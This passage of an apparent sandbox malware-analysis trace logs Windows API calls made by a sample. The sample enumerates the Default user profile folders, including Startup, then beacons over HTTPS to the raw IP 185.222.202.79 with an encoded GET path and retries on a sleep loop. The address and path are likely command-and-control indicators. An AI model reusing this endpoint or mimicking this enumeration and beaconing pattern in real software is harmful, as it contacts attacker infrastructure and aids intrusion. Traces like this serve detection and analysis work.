lpFindFileData=0x12c570) returned 1 [0233.025] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0233.025] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0233.025] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0233.025] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.025] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.025] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.025] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.025] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.025] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.025] lstrcmpiW (lpString1="Programs", lpString2=".") returned 1 [0233.026] lstrcmpiW (lpString1="Programs", lpString2="..") returned 1 [0233.026] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\*", lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0x309fc0 [0233.036] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.036] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0233.036] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.036] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.036] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0233.036] lstrcmpiW (lpString1="Accessories", lpString2=".") returned 1 [0233.036] lstrcmpiW (lpString1="Accessories", lpString2="..") returned 1 [0233.036] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Accessories\\\\*", lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 0x30a020 [0233.048] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.048] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.048] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.049] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.049] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.049] lstrcmpiW (lpString1="Accessibility", lpString2=".") returned 1 [0233.049] lstrcmpiW (lpString1="Accessibility", lpString2="..") returned 1 [0233.049] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Accessories\\\\Accessibility\\\\*", lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 0x30a080 [0233.050] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.050] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.050] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.050] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.050] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.050] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.050] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.050] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.050] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.050] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 0 [0233.050] FindClose (in: hFindFile=0x30a080 | out: hFindFile=0x30a080) returned 1 [0233.051] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.051] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.051] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.051] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.051] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.051] lstrcmpiW (lpString1="System Tools", lpString2=".") returned 1 [0233.051] lstrcmpiW (lpString1="System Tools", lpString2="..") returned 1 [0233.051] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Accessories\\\\System Tools\\\\*", lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 0x30a080 [0233.052] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.052] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.052] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.052] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.052] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.052] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.052] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.052] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.052] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 1 [0233.052] FindNextFileW (in: hFindFile=0x30a080, lpFindFileData=0x129b30 | out: lpFindFileData=0x129b30) returned 0 [0233.052] FindClose (in: hFindFile=0x30a080 | out: hFindFile=0x30a080) returned 1 [0233.053] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.053] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 0 [0233.053] FindClose (in: hFindFile=0x30a020 | out: hFindFile=0x30a020) returned 1 [0233.053] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0233.053] lstrcmpiW (lpString1="Administrative Tools", lpString2=".") returned 1 [0233.053] lstrcmpiW (lpString1="Administrative Tools", lpString2="..") returned 1 [0233.053] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Administrative Tools\\\\*", lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 0x30a020 [0233.054] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.054] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.054] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.054] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.054] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.054] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 0 [0233.054] FindClose (in: hFindFile=0x30a020 | out: hFindFile=0x30a020) returned 1 [0233.054] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0233.054] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0233.054] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0233.054] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0233.054] lstrcmpiW (lpString1="Maintenance", lpString2=".") returned 1 [0233.054] lstrcmpiW (lpString1="Maintenance", lpString2="..") returned 1 [0233.054] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Maintenance\\\\*", lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 0x30a020 [0233.054] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.054] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.054] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.054] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.054] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.054] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.054] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 0 [0233.054] FindClose (in: hFindFile=0x30a020 | out: hFindFile=0x30a020) returned 1 [0233.054] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0233.054] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 1 [0233.054] lstrcmpiW (lpString1="Startup", lpString2=".") returned 1 [0233.054] lstrcmpiW (lpString1="Startup", lpString2="..") returned 1 [0233.054] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*", lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 0x30a020 [0233.055] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.055] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.055] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.055] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.055] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 1 [0233.055] FindNextFileW (in: hFindFile=0x30a020, lpFindFileData=0x12a5c0 | out: lpFindFileData=0x12a5c0) returned 0 [0233.055] FindClose (in: hFindFile=0x30a020 | out: hFindFile=0x30a020) returned 1 [0233.055] FindNextFileW (in: hFindFile=0x309fc0, lpFindFileData=0x12b050 | out: lpFindFileData=0x12b050) returned 0 [0233.055] FindClose (in: hFindFile=0x309fc0 | out: hFindFile=0x309fc0) returned 1 [0233.055] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0233.055] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0233.055] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0233.055] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0233.055] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0233.055] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Templates\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0233.055] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.055] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.055] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.055] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.055] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0233.055] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0233.055] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 1 [0233.055] lstrcmpiW (lpString1="Themes", lpString2=".") returned 1 [0233.055] lstrcmpiW (lpString1="Themes", lpString2="..") returned 1 [0233.055] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Themes\\\\*", lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0x309f60 [0233.056] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0233.056] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.056] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0233.056] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0233.056] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 1 [0233.056] FindNextFileW (in: hFindFile=0x309f60, lpFindFileData=0x12bae0 | out: lpFindFileData=0x12bae0) returned 0 [0233.056] FindClose (in: hFindFile=0x309f60 | out: hFindFile=0x309f60) returned 1 [0233.056] FindNextFileW (in: hFindFile=0x309f00, lpFindFileData=0x12c570 | out: lpFindFileData=0x12c570) returned 0 [0233.056] FindClose (in: hFindFile=0x309f00 | out: hFindFile=0x309f00) returned 1 [0233.056] FindNextFileW (in: hFindFile=0x309ea0, lpFindFileData=0x12d000 | out: lpFindFileData=0x12d000) returned 0 [0233.056] FindClose (in: hFindFile=0x309ea0 | out: hFindFile=0x309ea0) returned 1 [0233.056] FindNextFileW (in: hFindFile=0x309e40, lpFindFileData=0x12da90 | out: lpFindFileData=0x12da90) returned 0 [0233.056] FindClose (in: hFindFile=0x309e40 | out: hFindFile=0x309e40) returned 1 [0233.233] WinHttpConnect (hSession=0x303d70, pswzServerName="185.222.202.79", nServerPort=0x1bb, dwReserved=0x0) returned 0x31dfe0 [0233.237] WinHttpSetTimeouts (hInternet=0x303d70, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1 [0233.237] WinHttpOpenRequest (hConnect=0x31dfe0, pwszVerb="GET", pwszObjectName="/sat36/YKYD69Q_W617601.2E664EE04488A02C628E0E6CA864C24A/5/spk/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x339fa0 [0233.238] WinHttpSetOption (hInternet=0x339fa0, dwOption=0x1f, lpBuffer=0x12df60, dwBufferLength=0x4) returned 1 [0233.238] WinHttpSendRequest (hRequest=0x339fa0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 0 [0254.267] Sleep (dwMilliseconds=0x3e8) [0255.281] WinHttpCloseHandle (hInternet=0x339fa0) returned 1 [0255.281] Sleep (dwMilliseconds=0x4e20) [0265.288] WinHttpSetTimeouts (hInternet=0x303d70, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1 [0265.288] WinHttpOpenRequest (hConnect=0x31dfe0, pwszVerb="GET", pwszObjectName="/sat36/YKYD69Q_W617601.2E664EE04488A02C628E0E6CA864C24A/5/spk/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x339fa0 [0265.288] WinHttpSetOption (hInternet=0x339fa0, dwOption=0x1f, lpBuffer=0x12df60, dwBufferLength=0x4) returned 1 [0265.288] WinHttpSendRequest (hRequest=0x339fa0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) Thread: id = 372 os_tid = 0x130 Thread: id = 373 os_tid = 0xb14 Thread: id = 374 os_tid = 0x500 Thread: id = 375 os_tid = 0xacc [0233.242] Sleep (dwMilliseconds=0xbb8) [0236.241] Sleep (dwMilliseconds=0xbb8) [0239.251] Sleep (dwMilliseconds=0xbb8) [0242.302] Sleep (dwMilliseconds=0xbb8) [0245.304] Sleep (dwMilliseconds=0xbb8) [0248.315] Sleep (dwMilliseconds=0xbb8) [0251.326] Sleep (dwMilliseconds=0xbb8) [0254.336] Sleep (dwMilliseconds=0xbb8) [0257.347] Sleep (dwMilliseconds=0xbb8) [0260.358] Sleep (dwMilliseconds=0xbb8) [0263.369] Sleep (dwMilliseconds=0xbb8) [0266.380] Sleep (dwMilliseconds=0xbb8) [0269.391] Sleep (dwMilliseconds=0xbb8) [0272.401] Sleep (dwMilliseconds=0xbb8) [0275.412] Sleep (dwMilliseconds=0xbb8)